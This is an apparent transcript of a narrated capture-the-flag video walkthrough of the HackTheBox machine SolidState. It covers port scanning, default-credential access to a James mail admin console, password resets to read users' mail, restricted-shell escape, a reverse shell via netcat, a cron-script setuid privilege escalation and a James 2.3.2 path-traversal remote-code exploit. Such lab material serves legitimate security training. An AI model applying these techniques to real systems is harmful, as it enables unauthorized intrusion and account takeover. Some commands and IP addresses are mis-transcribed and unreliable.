What's going on YouTube? This is Ipsec and we've been doing the machine SolidState from HackTheBox. This box was relatively straightforward as long as you did a full Nmap scan, which is something you should always do. I normally don't start off with a full Nmap scan because if you're scanning a large network, it can take a lot of time, but I normally will kick off a full port scan in the background while I examine the results of a Nmap. But enough talking, let's jump into the box. The first thing we do is an nmap, so nmap-sc for default scripts, sv for enumerate versions, oa output all formats. We'll throw them in the directory nmap and call the file initial. And then the IP address of solid state, which is 10.10.10.51. Looking at the results, we see that ports 22, 25, 80, 110, and 119 is open. There's a lot of mail type stuff running as James. I don't know what James is off the top of my head, so I'm just going to poke into Apache. But while I poke into Apache, I'm going to kick off a nmap on all ports because I always like recon running in the background while I work. So we'll do the nmap-p- to do all ports. That's ports 1 to 65,535, I believe. -T5 to be very aggressive, which means it's going to go quickly. Don't recommend that, but for the sake of the video, I want this to finish quickly. I'll put in the directory nmap and we'll call it all ports, and the IP address, which is 10.10.10.51. And enable split net mask. Oh, I forgot OA. -OA. There we go. So let's go over to the website of SolidState to see what it looks like. We see a website, and going over to different pages, we see all the pages are .html. I'd also look for things like robots.txt or /admin, and then eventually run a GoBuster to see if there's any pages. Generally, HTML things don't really interest me that much. If we scroll all the way down, we do see a contact form, and I would also probably look into trying to do the email because there is a PHP mailer vulnerability, but we haven't seen any indication of PHP on the website, so that is unlikely. But if I did send message and I saw message has been sent, I may go down that rabbit hole and play with it a little bit. But don't see anything too interesting. Going back, we see our nmap is still going. As I said, this can take a while. So I'm going to pause the video, we'll let this nmap finish, and we'll continue. Now that the nmap is finished, we do see a new port, port 4555. And if you want to see ports as the scan ran, you could always just add the -v flag in nmap. I normally do -vvv. I don't know if you have to do all three, but the more verbose, the better if I'm trying to get results quickly. Anyways, how I normally do nmaps after this output is I would do a grep-o capital P, and this is only going to show me the item I searched for. So it'll make much more sense once this command finishes. /D for digit, then a squiggly bracket, 1, 5, because I want to search all ports. Ports 1 to 65,535. And that is 5 digits long, so that's why the 5 is there. Then I'm going to do a /open, and I'm going to search that against the nmap/allports.gnmap, the greppable nmap format. Makes sense because we're doing grep. And we just get the list of ports that are open. It's only 6, but normally what I do then is a sort -u, and then pipe it to like ports.list. And then I'd edit ports.list, and I do like a %s for search and replace, //ope/g, or //g. And that should only leave me with ends left. And then I do %s/n/n, because that's the new line character, comma, g. And now we got a list of all the ports on one line. Probably a more efficient way to do that. That's just the easiest way I know of to remember it. And I don't know why I remember it that way, but that's just how it works sometimes. So let's do a new nmap. So nmap-p for those 6 ports, -sc for default scripts, sv, enumerate version. I'm going to add --script vuln because, well, we only have 6 ports, why not? And the IP address, which is 10.10.10.51. Should probably go back and do a -oa to output that result into, let's say, nmap targeted. So while that runs, let's look at port 4555. So nc 10.10.10.51 4555. Login ID, let's just say we're admin, password, admin, login failed, try root, and we get in. If you're looking for something to code, you may want to use like Python and expect to create a brute forcer for that one part. Relatively easy to do. If you look at my buffer overflow videos with pwn tools, you'll get kind of how that works. You don't have to use pwn tools, you can just use expect because you're not attached to a binary, but I digress. Let's run help to see what commands we have in this James server. We have list users, add users, set password, but let's list users first. We see James, something really weird, so it looks like someone may have exploited it. I don't know what that user should be, but that's signs that this service has been exploited. Then Thomas, John, Mindy, and male admin. Male admin sounds really juicy to me, so I'm going to do the set password, male admin, and we'll set it to password. Password for male admin has been reset, and I just looked up here to get that syntax. So my next step would be to go over to Thunderbird. And I went to Thunderbird because Nmap showed pop, SMTP, etc. open, so I want to use a mail client to access that pop. So add an email account, mail admin at 10.10.10.51. Password is password. Connect. Yes, we know this is plain text. And we don't really see anything. So let's not stop our enumeration there. Let's go to the next user, Mindy. Set password Mindy as password. I had a space there I shouldn't have. Password been reset. Let's add a new email. Mindy. Connect. Yes, I know the risks. And we got 2 email messages. Welcome and your access. And we see your SSH credentials are Mindy and password 1bang2at. So let's test that out. SSH Mindy at 10.10.10.51. Password 1bang2at. I typed that wrong. I didn't put the 5s, but we'll just copy this, paste it in, and we get a bunch of weird stuff. I'll Control-C out of that, clear the screen, and we get a SSH prompt. The first thing I do is ls, and we have a bin directory. That's a bit odd. And I hit tab, and something weird happened. ls bi tab restricted, cannot redirect output. So this is looking a bit odd. If I do cd command, cd restricted, so my tab auto completion looks like it may be broken. It is. And I can't cd ... and I get -r bash. This command is restricted. If I cat /etc passwd, we do see that the Mindy user is in /bin/bash as her default shell. Bash is restricted bash, which means a lot of her commands are restricted. The James user is /bin/bash. So we probably should escalate to James, and then we could escalate to root after that. However, we can just escape our bash shell. We'll show how to escalate to James at the end of the video, but this is how I did it, is I just typed bash, and we get some weird stuff before a username, but now we have tab autocomplete, and we can do cd ... So all that has been taken care of. Going to open up a new pane. We'll go to opt linux privesc, and I'm going to run linenum.sh. So python-m, simple HTTP server on port 80. I should have looked at my IP address. Ton 0. 10.10.10.14.23. So let's go to dev shm, which is the RAM disk, so nothing we do is saved to disk. And then we can download that script. 10.10.10.23 linenum.sh. And when we run the script, it won't actually get us the information we want. We want to actually specify the -t flag. If we do -h, it shows us all the options of linenum, but -t is thorough. And if you heard that, that was my email. Apologies, didn't have my phone muted. But anyways, we'll do linenum-t to include thorough test. And it says it's going to take a while, but it really doesn't. And what this does is it does a lot more file system searches, which is why it's thorough and takes a while. And I just hit a key I didn't want to. 2. There we go. So if we scroll all the way up, we don't see file permissions. Hold on. Let's see. Search up Debian. Next. chroot. So this is where the command starts, with thorough. So kernel information we don't really care about. We just see it's 2017-8.6. So chances are there's not going to be a kernel exploit. It's relatively up to date. Especially when this box came out, which was probably that month. Users that have been logged in, root and Mindy. We have multiple users logged in as Mindy. Etsy password. Our home permissions on home relaxed. So this is just showing us the home directory permissions. If we're not in the OS boxes group, we can't get into the James directory, which I don't believe we are. Files not owned by our user but are writable by group. We see opt-temp.py, and that is owned by root. So this is very peculiar. A root file that's chmodded to 777. Scrolling down, we have root login is allowed. Environment variables I don't really care about. Path I don't care about. Crons. Etsy cron tab. I don't see any unique crons there. Network info I don't care about. Ports. 631 is listening on localhost, and I don't think that's listening on other things, so that is peculiar. If I could talk. That is odd. So this could be a potential for privesc. We'd have to see what user is running on that port. the output of PS, binaries that we're running. This is anything in the home directories, in the Apache directories, which is all .html files, so that concludes no dynamic content, no PHP. Useful file locations, we have nc netcat wget on the server. Can we write to sensitive files? No, we can't. Root owns Etsy, passwd, group, profile, and shadow. And we only have read permissions to those files, and we don't have read permission to shadow. Set UID files. Everything looks standard. The set GUID files, everything looks standard. Word writable files. This temp.py is coming up. It's owned by root and chmod is 777. Configuration files, and we're finally done the thorough scan. So let's look at what that temp.py was. And we see it is just a script that is clearing out the temp directory. So if we wanted to, we could make that run any command. So if we do nc-h, see, do we have the -e flag? Actually, no, we don't have GCC. I guess we can just test it out. nc lvmp 1234, nc-e, bin bash, the IP address me, which is 10.10.10.10.14.23, 1234. So we can't do that. Can we do netcat-e? Can't do that. We'll just try and find a way to do a reverse shell easily. So we'll do pentestmonkey reverse shell. We'll try this method. Ten 14.23. And that works. So let's copy this and paste it in temp.py. And we'll see if root executes that. Again, the reason why I'm thinking root may execute that is it's just owned by root and chmod is 777. So root obviously owns that file, so it's probably not forensics from other people on the box. If you wanted to, you could write a script like I did in Nineva. We'll call it psmonitor.sh and see if I can remember all this. So we want to do ifs equals \n old programs equals pseo command. If you're curious what all these do, I explained it in Nineva. So while true, do new process equals pseo command diff echo old process to echo new process sleep. We'll do 0.2 p equals new process. Done. I think that may be good. that how I set that? There we go. The cron actually runs every 3 minutes. So it may take a little bit for that to go. So it's probably been 3 minutes and I did not get a hit back. So something went wrong. We can see my PS monitor did catch other stuff. People probably logging in the box. We got netcat to someone on port 80. But what we're going to do is v-op temp.py, and we're going to make this a bit simpler. So we're just going to which touch, user bin touch. I'm going to touch the file /temp/ipsec. And if this temp.py script gets executed, it's going to create a file in temp called ipsec, and it's going to be owned by root, hopefully. It'll be owned by whatever user runs that script. So, if we look at date, it should be running sometime soon. I'm going to pause the video for a few minutes, and we'll see if it runs. My apologies, I did a few LS's while the video was paused, but we do see the latest one. It ran right at the next 3-minute mark. It created the file ipsec, and it is owned by root. So we know the cron is running. So we're going to do opt temp.py again. And the issue, I guess, was this Python script didn't like how we were doing the reverse shell. So I'm going to trash the reverse shell idea. And we're just going to add a sticky bit to some file. So let's see. We do have dash, it looks like. And dash is not symlinked to bash, which I do see occasionally for some weird reason. Dash is another, I guess, terminal, and it doesn't strip the set UID bit like bash does sometimes. So if we add set UID bits to dash, we may be able just to privesc. And the reason I'm doing that is because we don't have GCC on the box to drop a shell easily. Because I could just copy a set UID binary to this box and then compile it and use that, like I'm going to do with dash, but GCC is not here. This box is 32-bit, and I don't have a 32-bit OS running right now to compile. So the easiest, or the path of least resistance right now, is just to do this. So os-system, we'll do a chmod 4. This is the set UID bit. 755 default permissions of most binaries, and we'll change that to bin/dash. If we do a date, oh wow, that may have actually just hit. Now it's 6 minutes. We'll do ls-la on bin dash. We see that set UID bit is there. So if I type dash, I get a command prompt. I can do ID. We see my UID and GID is still Mindy, but my effective UID is root. So if I do cd root, I can now get in the directory and own the box. Could also cat /etc shadow if I wanted to, because again, I am the root user. So that is how I pop the box without doing the James exploit, but let's jump in and actually use that James exploit now. So let's look at our initial Nmap scan. And we see that James version 2.3.2 is running. So if we did a search exploit for James, we do see a specific remote command execution for that one. So I'm going to do a search exploit -m. The M stands for mirror. What that's going to do is copy this into my current working directory, and then we can edit this. So scrolling down, we see payload. Let's just edit that out because we don't want to just touch a file. We want to get a reverse shell. So go to the reverse shell cheat sheet, copy that out, paste it, and put our IP address, which is 10.10.14.23, and we'll listen on port 1234. The credentials, default root, that's fine. The usage of the script is going to be just Python and then the IP address it says. Scrolling down, the script's going to create a user. So as I said, it looked funny when we listed user and we saw a bash completion. This is why. And then it's going to connect to James via SMTP and send a email address to the user it creates with the payload. So what's happening is there's a path traversal in the username. So when we do add user this and then exploit, it's adding a username of this. And James, by default, creates a directory for every user. That's how it organizes the emails. So when we specify this as the username, it's going to go up. This is 1, 2, 3, 4, 5, 6, 7, 8 directories, which is going to bring us into just slash, the root directory. Then it's going to go into Etsy and then bash_completion.d. So this is going to allow us to create files in this directory. And then when we send an email to that user, it creates a file in that directory with our payload. And then upon logging in, our payload gets executed. So let's try that out. So if we create a new pane, netcat lvnp 1234, Python, the script, and the IP address of James, which is 10.10.10.51. Payload will be executed once someone logs in. So let's log in with the user that we know, which is Mindy. p@55 capital W ORD 1 bang 2 @ logs in, and we get a shell. And this is the same shell we had when we just escaped restricted bash by typing bash, because essentially that's all it did. So this is hung because the login prompt for Mindy went over here, and we got the shell. As soon as we exit this to prove we're out of restricted, we can do that cd ... We'll get a shell over here. So I wonder, let's see. Well, we'd have to delete the stuff out of bash completion, which we probably don't have permission to do if I want to do. What I was going to do is try to background this. So let's see. Does this script actually support backgrounding? Or that reverse shell method? nc lvnp. What is it? Okay. 10, 14, 23. Will that background? I need to do 1, 2, 3, 4. Okay, that will background, it looks like. No, it will not. That crashed. Let's see. I think that box had netcat-e on it. We can try that real quick. So bash nc-e bin bash. Add that and at the end. 10. Do 1. Mindy. p@55 WORD. That's weird. Oh, I can't do bash. Huh. So it looks like the reason that restricted bash escape worked is because of a previous exploit that broke something. Yeah, so I guess the server was just in a really funky state because now my restricted bash escape isn't working. Oh, that's awesome. Huh. Cannot specify slash command names. Okay, well, this may be the box. Let's see if I can remember this root password. So I do. So if we remove everything, and this, we can do that exploit again. And this time, we'll see if it backgrounds. 5, 10, 10, 10, 1. Send the payload. It'll execute when someone logs in. Mindy at 10, 10, 10. That worked. Okay, so doing that made it so the user could still log in. And when that user logs in, it's still in the restricted shell. So everything's now looking kind of normal to the user, except all this junk up at the top. But now we have the two simultaneous shells. So that's all I wanted to show. I'm sure if we do... let's see if it has Python. So we do have Python, so we can do Python C, import pty, pty.spawn. We want single double quotes. And now we get that shell you're used to seeing. So that is the box. Hope you guys enjoyed, and I'll see you all next week.